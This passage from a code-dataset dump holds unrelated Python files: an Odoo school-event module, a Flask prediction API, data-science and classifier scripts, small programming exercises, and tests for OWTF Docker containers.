start-date.'))\n\n @api.model\n def search(self, args, offset=0, limit=None, order=None, count=False):\n\n if self._context.get('part_name_id'):\n student_obj = self.env['student.student']\n data = student_obj.browse(self._context.get('part_name_id'))\n arg_domain = ('part_standard_ids', 'in', [data.standard_id.id])\n args.append(arg_domain)\n return super(SchoolEvent, self).search(args, offset, limit, order,\n count=count)\n\n @api.multi\n def event_open(self):\n if self.part_ids and self.part_ids[0].id:\n self.write({'state': 'open'})\n else:\n raise UserError(_('No Participants ! \\\n No Participants to open the Event.'))\n\n @api.multi\n def event_close(self):\n self.state = 'close'\n return True\n\n @api.multi\n def event_draft(self):\n self.state = 'draft'\n return True\n\n @api.multi\n def event_cancel(self):\n self.state = 'cancel'\n return True\n\n\nclass SchoolEventRegistration(models.Model):\n '''for registration by students for events'''\n _name = 'school.event.registration'\n _description = 'Event Registration'\n\n name = fields.Many2one('school.event', 'Event Name',\n domain=[('state', '=', 'draft')], required=True)\n part_name_id = fields.Many2one('student.student', 'Participant Name',\n required=True)\n reg_date = fields.Date('Registration Date', readonly=True,\n default=lambda *a:\n time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n state = fields.Selection([('draft', 'Draft'),\n ('confirm', 'Confirm'),\n ('cancel', 'Cancel')], 'State', readonly=True,\n default='draft')\n is_holiday = fields.Boolean('Is Holiday(s)', help='Checked if the event is\\\n organized on holiday.')\n\n @api.multi\n def regi_cancel(self):\n event_obj = self.env['school.event']\n student_obj = self.env['student.student']\n event_part_obj = self.env['school.event.participant']\n self.write({'state': 'cancel'})\n\n for reg_data in self:\n event_data = event_obj.browse(reg_data.name.id)\n prt_data = student_obj.browse(reg_data.part_name_id.id)\n # delete entry of participant\n domain = [('stu_pid', '=', prt_data.pid),\n ('event_id', '=', reg_data.name.id),\n ('name', '=', reg_data.part_name_id.id)]\n stu_prt_data = event_part_obj.search(domain)\n stu_prt_data.unlink()\n # remove entry of event from student\n list1 = []\n\n for part in prt_data.event_ids:\n part = student_obj.browse(part.id)\n list1.append(part.id)\n flag = True\n\n for part in list1:\n data = event_part_obj.browse(part)\n if data.event_id.id == reg_data.name.id:\n flag = False\n\n if not flag:\n list1.remove(part)\n stu_part_id = student_obj.browse(reg_data.part_name_id.id)\n stu_part_id.write({'event_ids': [(6, 0, list1)]})\n list1 = []\n # remove entry of participant from event\n flag = True\n\n for par in event_data.part_ids:\n part = event_part_obj.browse(par.id)\n list1.append(part.id)\n\n for par in list1:\n data = event_part_obj.browse(par)\n\n if data.name.id == reg_data.part_name_id.id:\n parii = par\n flag = False\n\n if not flag:\n list1.remove(parii)\n participants = int(event_data.participants) - 1\n event_reg_id = event_obj.browse(reg_data.name.id)\n event_reg_id.write({'part_ids': [(6, 0, list1)],\n 'participants': participants})\n return True\n\n @api.multi\n def regi_confirm(self):\n self.write({'state': 'confirm'})\n event_obj = self.env['school.event']\n student_obj = self.env['student.student']\n event_part_obj = self.env['school.event.participant']\n\n for reg_data in self:\n event_data = event_obj.browse(reg_data.name.id)\n prt_data = student_obj.browse(reg_data.part_name_id.id)\n participants = int(event_data.participants) + 1\n\n # check participation is full or not.\n if participants > event_data.maximum_participants:\n raise UserError(_('Error ! \\\n Participation in this Event is Full.'))\n\n # check last registration date is over or not\n if reg_data.reg_date > event_data.last_reg_date:\n raise UserError(_('Error ! Last Registration date is over \\\n for this Event.'))\n # make entry in participant\n val = {'stu_pid': str(prt_data.pid),\n 'score': 0,\n 'win_parameter_id': event_data.parameter_id.id,\n 'event_id': reg_data.name.id,\n 'name': reg_data.part_name_id.id}\n temp = event_part_obj.create(val)\n # make entry of event in student\n list1 = []\n\n for evt in prt_data.event_ids:\n part = student_obj.browse(evt.id)\n list1.append(part.id)\n flag = True\n\n for evt in list1:\n data = event_part_obj.browse(evt)\n if data.event_id.id == reg_data.name.id:\n flag = False\n\n if flag:\n list1.append(temp.id)\n stu_part_id = student_obj.browse(reg_data.part_name_id.id)\n stu_part_id.write({'event_ids': [(6, 0, list1)]})\n # make entry of participant in event\n list1 = []\n flag = True\n\n for evt in event_data.part_ids:\n part = event_part_obj.browse(evt.id)\n list1.append(part.id)\n\n for evt in list1:\n data = event_part_obj.browse(evt)\n if data.name.id == reg_data.part_name_id.id:\n flag = False\n\n if flag:\n list1.append(temp.id)\n evnt_reg_id = event_obj.browse(reg_data.name.id)\n evnt_reg_id.write({'part_ids': [(6, 0, list1)]})\n return True\n\n\nclass StudentStudent(models.Model):\n _name = 'student.student'\n _inherit = 'student.student'\n _description = 'Student Information'\n\n event_ids = fields.Many2many('school.event.participant',\n 'event_participant_student_rel', 'event_id',\n 'stu_id', 'Events', readonly=True)\n\n @api.model\n def search(self, args, offset=0, limit=None, order=None, count=False):\n if self._context.get('name'):\n event_obj = self.env['school.event']\n event_data = event_obj.browse(self._context['name'])\n std_ids = [std_id.id for std_id in event_data.part_standard_ids]\n args.append(('standard_id', 'in', std_ids))\n return super(StudentStudent, self).search(args, offset, limit, order,\n count=count)\n","sub_path":"school_event/models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":13186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"311362874","text":"from flask import Flask, jsonify, abort, request, make_response, url_for, render_template\nfrom flask_cors import CORS, cross_origin\nimport numpy as np\nimport pickle\n\n\napp = Flask(__name__, static_url_path = \"/static\")\ncors = CORS(app)\n\n@app.errorhandler(400)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Bad request' } ), 400)\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify( { 'error': 'Not found' } ), 404)\n\n\n# main route\n# render index.html\n@app.route('/', methods = ['GET'])\ndef index():\n return render_template('index.html')\n\n# endpoint to predict the probability\n# we restore our tensorflow model in model folder\n# and use that to make a prediction\n@app.route('/api/v1.0/bayes', methods = ['POST'])\ndef predict():\n \n \n X_predict = np.float32([[request.form['umur'], request.form['pekerjaan'], request.form['penghasilan'], request.form['jml_ang_kel'], request.form['status_rumah']]])\n\n \n ################################\n # Load pickle\n ################################\n\n gnb = pickle.load( open( \"bayes.p\", \"rb\" ))\n\n predict = gnb.predict(X_predict)\n\n\n response = {\n 'endpoint': 'api/v1.0/bayes',\n 'method': 'POST',\n 'umur': request.form['umur'],\n 'pekerjaan': request.form['pekerjaan'],\n 'penghasilan': request.form['penghasilan'],\n 'jumlah': request.form['jml_ang_kel'],\n 'status_rumah': request.form['status_rumah'],\n 'status':int(predict)\n }\n\n return jsonify( { 'response': response } )\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug = True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148786907","text":"#!/usr/bin/env python\r\n#coding: utf-8\r\nimport gzip\r\nimport json\r\nimport re # 正規表現\r\nfilename = \"jawiki-country.json.gz\"\r\n\r\ndef extract_UK():\r\n # イギリスの本文を戻り値として取得\r\n\r\n # rtは読み込み専用&テキストモード(いずれもデフォルト)\r\n with gzip.open(filename, \"rt\", encoding = \"utf-8\") as data_file:\r\n for line in data_file:\r\n data_json = json.loads(line)# jsonのデータをロードしてpythonのデータ型に変換\r\n if data_json[\"title\"] == \"イギリス\":# タイトルが「イギリス」の時\r\n return data_json[\"text\"]# 本文を戻り値として返す\r\n\r\n raise ValueError(\"Not Found Article About UK\")\r\n # タイトルがイギリスでないとき例外処理としてValueErrorを出す\r\n\r\n\r\n# 正規表現のコンパイル、あらかじめ使う正規表現を書き込んでおく\r\npattern = re.compile(r'''\r\n ^ # 行頭\r\n (={2,}) # キャプチャ対象、2個以上の'='\r\n \\s* # 余計な0個以上の空白(”哲学”や”婚姻”の前後に余分な空白があるため除去)\r\n (.+?) # 余分な0個以上の空白\r\n \\1 # 後方参照、1番目のキャプチャ対象と同じ内容\r\n .* # 任意の文字が0文字以上\r\n $ # 行末\r\n ''', re.MULTILINE + re.VERBOSE)\r\n # MULTILINEは読み込みが複数行あるため、VERBOSEは正規表現中にコメントするため\r\n\r\n# 抽出\r\nresult = pattern.findall(extract_UK())#findallはマッチした部分だけを持ってくる\r\n\r\n# 結果表示\r\nfor line in result:\r\n level = len(line[0]) - 1 #\"=\"の数 - 1\r\n print(\"{indent}{sect}({level})\".format( #format関数を使用\r\n indent = \"\\t\" * (level -1), sect = line[1], level = level))\r\n","sub_path":"test23.py","file_name":"test23.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59096281","text":"import collections\nimport math\nimport functools\nimport operator\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef main():\n label_column = 'label'\n raw_data = pd.read_csv('./data/spam.csv', encoding='latin-1')\n\n processed_data = raw_data[['v1', 'v2']]\n processed_data = processed_data.rename(columns={'v1': label_column, 'v2': 'text'})\n processed_data[label_column] = processed_data.label.map({'ham': 0, 'spam': 1})\n processed_data['text'] = processed_data['text'].apply(process_text)\n\n vocabulary = get_vocabulary(processed_data['text'].str.cat(sep=' '))\n processed_data['feature_list'] = processed_data['text'].apply(lambda s: [vocabulary[word] for word in s.split()])\n processed_data['empty'] = processed_data['feature_list'].apply(lambda fs: not fs)\n processed_data = processed_data[processed_data['empty'] == False]\n\n ham, spam = processed_data[processed_data[label_column] == 0]['feature_list'], processed_data[processed_data[label_column] == 1]['feature_list']\n ham_probs, spam_probs = get_probabilities(ham, spam, vocabulary)\n\n processed_data['prediction'] = processed_data['feature_list'].apply(lambda fs: predict(fs, ham_probs, spam_probs, ham, spam, vocabulary))\n processed_data['correct'] = np.where(processed_data[label_column] == processed_data['prediction'], 1, 0)\n\n accuracy = processed_data['correct'].mean()\n print(f'Accuracy: {accuracy}')\n\ndef predict(fs, neg_probabilities, pos_probabilities, negatives, positives, vocabulary):\n neg_wordcount = sum(len(fs) for fs in negatives)\n neg_prob = functools.reduce(operator.mul, (neg_probabilities[f] if f in neg_probabilities else (1 / (neg_wordcount + len(vocabulary))) for f in fs))\n pos_wordcount = sum(len(fs) for fs in positives)\n pos_prob = functools.reduce(operator.mul, (pos_probabilities[f] if f in pos_probabilities else (1 / (pos_wordcount + len(vocabulary))) for f in fs))\n\n return 0 if neg_prob > pos_prob else 1\n\ndef get_probabilities(negatives, positives, vocabulary):\n neg_wordcount = sum(len(fs) for fs in negatives)\n neg_probabilities = {k: (v + 1) / (neg_wordcount + len(vocabulary)) for k, v in functools.reduce(operator.add, (collections.Counter(fs) for fs in negatives)).items()}\n \n pos_wordcount = sum(len(fs) for fs in positives)\n pos_probabilities = {k: (v + 1) / (pos_wordcount + len(vocabulary)) for k, v in functools.reduce(operator.add, (collections.Counter(fs) for fs in positives)).items()}\n\n return neg_probabilities, pos_probabilities\n\ndef get_vocabulary(s):\n return {word: i + 1 for i, word in enumerate(set(s.split()))}\n\ndef process_text(text, remove_chars=['.', ',', '!', '?', '\\'', '(', ')', '\"', ':', '-', '/', '\\\\', '$', '=', '>', '<', '&', '#', ';', '÷', '£', '+', '*']):\n text = text.lower()\n text = ''.join(c for c in text if c not in remove_chars and not c.isdigit())\n text = ' '.join(word.strip() for word in text.split())\n\n return text\n\ndef process_string(s, remove_chars=[]):\n return replace_chars(s.lower(), remove_chars).strip()\n\ndef replace_chars(s, remove_chars, replace_char=' '):\n return ''.join(replace_char if c in remove_chars else c for c in s.lower().strip())\n\nif __name__ == \"__main__\":\n main()","sub_path":"naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"598890521","text":"# Compare the tim to train IncrementalPCA, RandomizedPCA, and PCA\n# Support for python 2 and 3\nfrom __future__ import unicode_literals, division, print_function\n\n# Common Imports\nimport numpy as np\nimport time\nimport os\n\n# ML Imports\nfrom sklearn.decomposition import PCA, IncrementalPCA\nfrom sklearn.datasets import fetch_mldata\nfrom sklearn.model_selection import train_test_split\n\n# Graph Imports\nimport matplotlib.pyplot as plt\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\n# Config\nPROJECT_ROOT_DIR = \".\"\n\n\n# Declare Function\ndef image_path(fig_id):\n if not os.path.exists('images'):\n os.makedirs('images')\n return os.path.join(PROJECT_ROOT_DIR, 'images', fig_id)\n\n\ndef save_fig(fig_id, tight_layout=True):\n print(\"Saving\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(image_path(fig_id) + \".png\", format=\"png\", dpi=300)\n\n\n# Get Data\nmnist = fetch_mldata('MNIST original')\n\nX = mnist[\"data\"]\ny = mnist[\"target\"]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y)\n\n# Train comparing with various components\nfor n_components in (2, 10, 154):\n print(\"n_components =\", n_components)\n regular_pca = PCA(n_components=n_components)\n inc_pca = IncrementalPCA(n_components=n_components, batch_size=500)\n rnd_pca = PCA(\n n_components=n_components, random_state=42, svd_solver=\"randomized\")\n\n for pca in (regular_pca, inc_pca, rnd_pca):\n t1 = time.time()\n pca.fit(X_train)\n t2 = time.time()\n print(\" {}: {:.1f} seconds\".format(pca.__class__.__name__, t2 - t1))\n\n# Train with datasets of various sizes\ntimes_rpca = []\ntimes_pca = []\nsizes = [\n 1000, 10000, 20000, 30000, 40000, 50000, 70000, 100000, 200000, 500000\n]\nfor n_samples in sizes:\n X = np.random.randn(n_samples, 5)\n pca = PCA(n_components=2, svd_solver=\"randomized\", random_state=42)\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_rpca.append(t2 - t1)\n pca = PCA(n_components=2)\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_pca.append(t2 - t1)\n\nplt.plot(sizes, times_rpca, \"b-o\", label=\"RPCA\")\nplt.plot(sizes, times_pca, \"r-s\", label=\"PCA\")\nplt.xlabel(\"n_samples\")\nplt.ylabel(\"Training time\")\nplt.legend(loc=\"upper left\")\nplt.title(\"PCA and Randomized PCA time complexity\")\n\nsave_fig(\"pca_and_randomized_pca_time_complexity\")\nplt.show()\n\n# Compared performance with dataset of 20000 instances\ntimes_rpca = []\ntimes_pca = []\nsizes = [1000, 2000, 3000, 4000, 5000, 6000]\nfor n_features in sizes:\n X = np.random.randn(2000, n_features)\n pca = PCA(n_components=2, random_state=42, svd_solver=\"randomized\")\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_rpca.append(t2 - t1)\n pca = PCA(n_components=2)\n t1 = time.time()\n pca.fit(X)\n t2 = time.time()\n times_pca.append(t2 - t1)\n\nplt.plot(sizes, times_rpca, \"b-o\", label=\"RPCA\")\nplt.plot(sizes, times_pca, \"r-s\", label=\"PCA\")\nplt.xlabel(\"n_features\")\nplt.ylabel(\"Training time\")\nplt.legend(loc=\"upper left\")\nplt.title(\"PCA and Randomized PCA time complexity\")\n","sub_path":"dimensionality_reduction/examples/time_complexity.py","file_name":"time_complexity.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"514640627","text":"final = {}\nrelationships = {}\n\ndef findParent(name, gene):\n\tif name in final.keys():\n\t\treturn (name, final[name])\n\telse:\n\t\tparent1 = ''\n\t\tparent2 = ''\n\t\tfor key, value in relationships.items():\n\t\t\tif value == name and parent1 == '':\n\t\t\t\tparent1 = key\n\t\t\telif value == name and key != parent1:\n\t\t\t\tparent2 = key\n\t\t\t\tnewName1,gene1 = findParent(parent1, '')\n\t\t\t\tnewName2,gene2 = findParent(parent2, '')\n\t\t\t\tif (gene1 == \"dominant\" and gene2 == \"dominant\") or (gene1 == \"dominant\" and gene2 == \"recessive\") or (gene1 == \"recessive\" and gene2 == \"dominant\"):\n\t\t\t\t\tfinal[name] = \"dominant\"\n\t\t\t\t\treturn (name, \"dominant\")\n\t\t\t\telif gene1 == \"dominant\" or gene2 == \"dominant\" or (gene1 == \"recessive\" and gene2 == \"recessive\"):\n\t\t\t\t\tfinal[name] = \"recessive\"\n\t\t\t\t\treturn (name, \"recessive\")\n\t\t\t\telse:\n\t\t\t\t\tfinal[name] = \"non-existent\"\n\t\t\t\t\treturn (name, \"non-existent\")\n\t\t\telse: \n\t\t\t\tcontinue\n\t\treturn (name,\"non-existent\")\n\n\n\n\nnumLines = int(input().strip())\n\nfor i in range(numLines):\n\tstr1, str2 = input().strip().split()\n\tif str2 == \"dominant\" or str2 == \"recessive\" or str2 == \"non-existent\":\n\t\tfinal[str1] = str2\n\telse:\n\t\trelationships[str1] = str2\nfor key, value in relationships.items():\n\tif value in final.keys():\n\t\tcontinue\n\telse:\n\t\tdiscard = findParent(value, '')\nfor key, value in sorted(final.items()):\n\tprint(key+' '+value)","sub_path":"genes.py","file_name":"genes.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"628259793","text":"'''\nGiven a number n (user input), Write a Python program to determine if n is a prime.\n'''\n\ndef prime(number: int) -> bool:\n '''\n Assume not prime until proven\n '''\n prime= False\n for i in range(2,10):\n # Check for numbers < 10 \n prime_singles = [1,2,3,5,7]\n if number in prime_singles:\n prime=True\n break\n # Check for numbers > 10 \n if number % i == 0: \n prime= False\n break\n else:\n prime=True\n return prime\n\n# Print if prime or not prime\nprint('Python program to determine if n is a prime.')\nnumber= int(input('Enter a number: $ '))\nif prime(number):\n print('number: ', number, 'is prime')\nelse: \n print('number: ', number, 'is not prime')","sub_path":"homework/random_problems/10exercise.py","file_name":"10exercise.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148099494","text":"import sys\nimport pickle\nimport logging\nimport datetime\n\nfrom os import path\nimport pandas as pd\nimport numpy as np\nimport xgboost as xgb\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import r2_score\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\n# Log time-level and message for getting a running estimate\nlogging.basicConfig(stream=sys.stdout, format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# This will only use the Label Encoder as on using the one hot encoding \n# we have to guarantee all the values in that one-hot-column has to present \n# in the test dataset also otherwise it will result in the feature mismatch bug\n\n# TODO To resolve this we need put the columns in same order and intialize the old columns \n# We will do this in later in this we are training a simple XGB Model for the seven days data\n\n# Batch size of 100000\nCHUNKSIZE = 10000\nCONSTANT_FILLER = 'unknown_flag'\n\ndef saveModel(xg_reg, learning_rate_val, max_depth_val):\n\tfilename = '/data/models/XGB_MODEL_{}_{}_{}.sav'\n\tfilename = filename.format(learning_rate_val, max_depth_val, int(datetime.datetime.now().timestamp())) \n\tpickle.dump(xg_reg, open(filename, 'wb'))\n\n\tlogging.info(\"training complete and model is saved\")\n\n# Load the Labels Vocabulary in One Hot Encoder\ndef loadCategorialList(base_folder, columnNm):\n\tmap_file = base_folder + columnNm + \"_map.dict\"\n\tif not path.exists(map_file):\n\t\traise RuntimeError(\"Map file missing for \"+ columnNm + \" name\")\n\n\tcolumn_dict_file = open(map_file, \"rb\")\n\tcolumn_dict = pickle.load(column_dict_file)\n\tcolumn_series = pd.Series(column_dict)\n\treturn list(column_series.index)\n\ndef trainModel(learning_rate_val, max_depth_val, base_folder, earlyBreak):\n\t\t\n\tlearning_params = {\n\t\t'objective' : 'reg:squarederror',\n\t\t'colsample_bytree' : 0.3,\n\t\t'learning_rate' : learning_rate_val, \n 'max_depth' : max_depth_val,\n 'alpha' : 5,\n 'n_estimators' : 10\n\t}\n\txg_reg = None\n\n\t#Load the categorical columns for faster filling in between\n\tcategoricalCols = [ 'slot_names', 'container_type', 'component_name', 'component_namespace', 'site']\n\tcategoryLists = []\n\tfor col in categoricalCols:\n\t\tcategoryLists.append(loadCategorialList(base_folder, col))\n\n\tone_hot_encoder = OneHotEncoder(categories=categoryLists, handle_unknown='ignore', sparse=False)\t\n\n\tchunkcount = 1\n\ttraining_data_file = base_folder + '3HourDataFullFile.csv'\n\tfor chunk in pd.read_csv(training_data_file, chunksize=CHUNKSIZE):\n\t\tlogging.info(\"Start chunk Processing - \" + str(chunkcount))\n\t\tlogging.info(chunk.columns)\n\t\t\n\t\tYColumns = ['impressions']\n\t\tnumericCols = ['guarantee_percentage', 'days_interval', 'hours_interval']\n\t\tcolumns_to_keep = YColumns + categoricalCols + numericCols \n\t\tdf_merged_set = chunk[columns_to_keep]\t\n\t\t\n\t\tnLength = len(numericCols)\n\t\tcLength = len(categoricalCols)\n\t\tX1, X2, Y = df_merged_set.iloc[:,1:cLength+1], df_merged_set.iloc[:,cLength+1:cLength+nLength+1], df_merged_set.iloc[:,0]\n\t\t\n\t\tone_hot_encoder.fit(X1)\n\t\tone_hot_encoded = one_hot_encoder.transform(X1)\n\n\t\t# Drop the ctegorical columns \t\n\t\tdataMatrix = xgb.DMatrix(np.concatenate((X2, one_hot_encoded), axis=1), label=Y.to_numpy())\n\t\tif(chunkcount==1):\n\t\t\txg_reg = xgb.train(learning_params, dataMatrix, 10)\n\t\telse:\n\t\t\t# Takes in the intially model and produces a better one\n\t\t\txg_reg = xgb.train(learning_params, dataMatrix, 10, xgb_model=xg_reg)\n\t\tlogging.info(\"Model saved \"+str(xg_reg))\n\t\tif(earlyBreak=='1' and chunkcount>10):\n\t\t\tbreak\n\t\tchunkcount = chunkcount + 1 \n\tlogging.info(xg_reg)\n\tsaveModel(xg_reg, learning_rate_val, max_depth_val)\n\tpredict(xg_reg, one_hot_encoder, base_folder, earlyBreak)\n\ndef predict(xg_reg, one_hot_encoder, base_folder, earlyBreak):\n\ttraining_data_file = base_folder + '3HourDataFullFile.csv'\n\n\tchunkcount = 1\n\tcategoricalCols = [ 'slot_names', 'container_type', 'component_name', 'component_namespace', 'site']\n\tfor chunk in pd.read_csv(training_data_file, chunksize=CHUNKSIZE):\n\t\tYColumns = ['impressions']\n\t\tnumericCols = ['guarantee_percentage', 'days_interval', 'hours_interval']\n\t\tcategoricalCols = [ 'slot_names', 'container_type', 'component_name', 'component_namespace', 'site']\n\n\t\tcolumns_to_keep = YColumns + categoricalCols + numericCols \n\t\tdf_merged_set = chunk[columns_to_keep]\t\n\t\t\n\t\tnLength = len(numericCols)\n\t\tcLength = len(categoricalCols)\n\t\tX1, X2, Y = df_merged_set.iloc[:,1:cLength+1], df_merged_set.iloc[:,cLength+1:cLength+nLength+1], df_merged_set.iloc[:,0]\n\t\t\n\t\tone_hot_encoder.fit(X1)\n\t\tone_hot_encoded = one_hot_encoder.transform(X1)\n\n\t\tdataMatrix = xgb.DMatrix(np.concatenate((X2, one_hot_encoded), axis=1), label=Y.to_numpy())\n\t\tpredictions = xg_reg.predict(dataMatrix)\n\n\t\tdf = pd.DataFrame({'actual': Y, 'predictions': predictions})\n\t\taccuracy = r2_score(Y.to_numpy(), predictions)\n\t\tlogging.info(\"Accuracy(Max:1 , 0 for stright line) : \" + str(accuracy))\n\t\tlogging.info(str(df.head()))\n\t\t\n\t\tif(earlyBreak=='1' and chunkcount>10):\n\t\t\tbreak\n\t\tchunkcount = chunkcount + 1 \t\n\tlogging.info(\"Prediction Over\")\n\ndef __main__():\n\t# count the arguments\n\tif len(sys.argv) < 4:\n\t\traise RuntimeError(\"Please provode the learning_rate, max_depth, base folder and earlyBreak\")\n\ttrainModel(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n\n#This is required to call the main function\nif __name__ == \"__main__\":\n\t__main__()","sub_path":"LinearModels/XGB_model_single_file.py","file_name":"XGB_model_single_file.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"385033177","text":"'''\n#n = int(input())\nn = ['b : a c d', 'd : f a b d', 'b : y', 'y : b']\nq = ['a b', 'a f', 'd b', 'b d']\n['A', 'B : A', 'C : A', 'D : B C']\n['A B', 'B D', 'C D', 'D A']\nmd = dict()\nvisited = []\nallclases = set()\n\ndef getParrents(pclass):\n visited.append(pclass)\n findset = md.get(pclass)\n if findset is not None:\n for i in findset:\n if j not in visited:\n findset.update(getParrents(pclass))\n else:\n return set()\n return findset\n \n#for i in range(n):\nfor i in n: \n \n #ls = input().split()\n ls = i.replace(':', ' ').split()\n\n if len(ls) > 0:\n pClass = ls.pop(0)\n pSet = set(ls)\n pSet.add(pClass)\n allclases.update(pSet)\n checks = md.get(pClass)\n if checks is not None:\n pSet.update(checks)\n\n md[pClass] = pSet\n \nfor j in allclases:\n if j in md.keys():\n visited.clear()\n fPrs = getParrents(j)\n if fPrs is not None:\n md[j] = fPrs\n else:\n md[j] = set()\n\n#q = int(input())\n\nprint(md)\n\nqvery = list()\n\n#for j in range(q):\nfor j in q:\n qvery.append(j.split())\n\nfor ii in qvery:\n ii.reverse()\n lenii = len(ii)\n \n if len(ii) == 0:\n print('No')\n \n else:\n rez = md.get(ii[0])\n\n if rez is None:\n print('No')\n elif lenii < 2:\n print('Yes')\n else:\n if ii[1] in rez:\n print('Yes')\n else:\n print('No')\n '''\n############################################################\n\n\n#n = int(input())\nnn = ['A', 'B : A', 'C : A', 'D : B C']\nq = ['A B', 'B D', 'C D', 'D A']\n\nmd = dict()\nvisited = []\nallclases = set()\nqvery = list()\nmd2 = dict()\ntempset = set()\n\n#for i in range(n):\n#nn.append(input())\n\ndef getparset(chld):\n visited.append(chld)\n chi = md.get(chld)\n if chi is None:\n tempset.update(set([chld]))\n else:\n tempset.update(chi)\n for i in chi:\n if i not in visited:\n getparset(i)\n\nfor i in nn:\n\n if len(i) > 0:\n ls = i.replace(':', ' ').split()\n allclases.update(set(ls))\n prc = ls.pop(0)\n checkprc = md.get(prc)\n if checkprc is None:\n md[prc] = set(ls)\n else:\n md[prc].update(set(ls))\n\nfor i in allclases:\n visited.clear()\n tempset.clear()\n getparset(i)\n md2[i] = tempset.copy()\n\n\n#for j in range(q):\nfor j in q:\n qvery.append(j.split())\n\nfor ii in qvery:\n\n if len(ii) < 2:\n print('Yes')\n elif ii[0] == ii[1]:\n print('Yes')\n else:\n getmd2 = md2.get(ii[1])\n if getmd2 is not None:\n if ii[0] in getmd2:\n print('Yes')\n else:\n print('No')\n\nprint(allclases)\nprint(md)\nprint(md2)\n############################################################","sub_path":"newStepic/step2.py","file_name":"step2.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"120331004","text":"\nimport unittest\nfrom core.dockerutils import OwtfContainer\nfrom core.dockerutils.dclient import *\n\nTEST_CONTAINER_PATH = '../containers/testcontainer'\n\nclass OwtfContainerTest(unittest.TestCase):\n\n # def setUp(self):\n # oc = OwtfContainer('../core/containers/testcontainer')\n # if oc.image_id in [i['Id'] for i in cli.images()]:\n # oc.remove_image()\n #\n # if oc.container_id in [i['Id'] for i in cli.containers(all=True)]:\n # oc.remove_container()\n #\n def tearDown(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n if oc.image_id in [i['Id'] for i in cli.images()]:\n oc.remove_image()\n\n if oc.container_id in [i['Id'] for i in cli.containers(all=True)]:\n oc.remove_container()\n\n def test_not_valid_false(self):\n oc = OwtfContainer('../core/containers/testcontainers')\n self.assertFalse(oc.is_valid)\n\n def test_validate_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n self.assertTrue(oc.is_valid)\n\n def test_buildingimage_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n self.assertTrue(oc.is_valid)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n self.assertTrue(oc.image_id in [i['Id'] for i in cli.images()])\n\n def test_removeimage_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n oc.remove_image()\n self.assertFalse(oc.is_image_build)\n self.assertFalse(oc.image_id in [i['Id'] for i in cli.images()])\n\n def test_buildcontainer_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n if oc.is_running and oc.is_container_build:\n oc.stop()\n self.assertFalse(oc.is_running)\n oc.remove_container()\n self.assertFalse(oc.is_container_build)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n oc.build_container()\n self.assertTrue(oc.is_container_build)\n self.assertTrue(oc.container_id in [i['Id'] for i in cli.containers(all=True)])\n\n def test_removecontainer_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n if not oc.is_container_build:\n oc.build_image()\n oc.build_container()\n self.assertTrue(oc.is_image_build)\n self.assertTrue(oc.is_container_build)\n oc.remove_container()\n self.assertFalse(oc.is_container_build)\n self.assertFalse(oc.container_id in [i['Id'] for i in cli.containers(all=True)])\n\n def test_startcommandsstop_true(self):\n oc = OwtfContainer(TEST_CONTAINER_PATH)\n oc.build_image()\n self.assertTrue(oc.is_image_build)\n oc.build_container()\n self.assertTrue(oc.is_container_build)\n oc.start()\n self.assertTrue(oc.is_running)\n self.assertTrue(oc.container_id in [i['Id'] for i in cli.containers()])\n commands = '[{\"code\": \"666\", \"noise\": \"passive\", \"command\": \"sleep 5s\", \"target\": \"\", \"description\": \"Test\"}]'\n self.assertEqual(oc.get_available_commands(), commands)\n oc.stop()\n self.assertFalse(oc.container_id in [i['Id'] for i in cli.containers()])\n self.assertFalse(oc.is_running)\n\n def test_running_container(self):\n oc1 = 